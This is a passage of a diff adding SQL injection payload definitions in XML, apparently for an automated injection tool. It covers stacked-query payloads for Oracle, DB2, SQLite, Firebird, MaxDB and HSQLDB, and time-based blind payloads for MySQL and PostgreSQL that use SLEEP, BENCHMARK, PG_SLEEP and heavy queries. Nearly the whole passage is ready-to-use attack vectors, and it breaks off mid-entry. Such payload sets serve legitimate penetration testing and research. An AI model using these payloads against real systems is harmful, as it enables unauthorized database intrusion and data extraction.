+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 stacked queries (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 stacked queries (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>Firebird stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB stacked queries (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB stacked queries (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
+    <!-- End of stacked queries tests -->
+</root>
diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
new file mode 100644
index 000000000..e8993f92b
--- /dev/null
+++ b/xml/payloads/05_time_blind.xml
@@ -0,0 +1,1985 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Time-based boolean tests -->
+    <test>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>AND SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>OR SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>AND SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>OR SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt;= 5.0.11 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt;= 5.0.11 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+             <dbms_version>&gt;= 5.0.12</dbms_version>
+       </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
+        <request>
+            <payload>RLIKE SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
+        <request>
+            <payload>RLIKE SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL AND time-based blind (ELT)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR time-based blind (ELT)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL AND time-based blind (ELT - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL OR time-based blind (ELT - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 AND time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 AND time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 OR time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
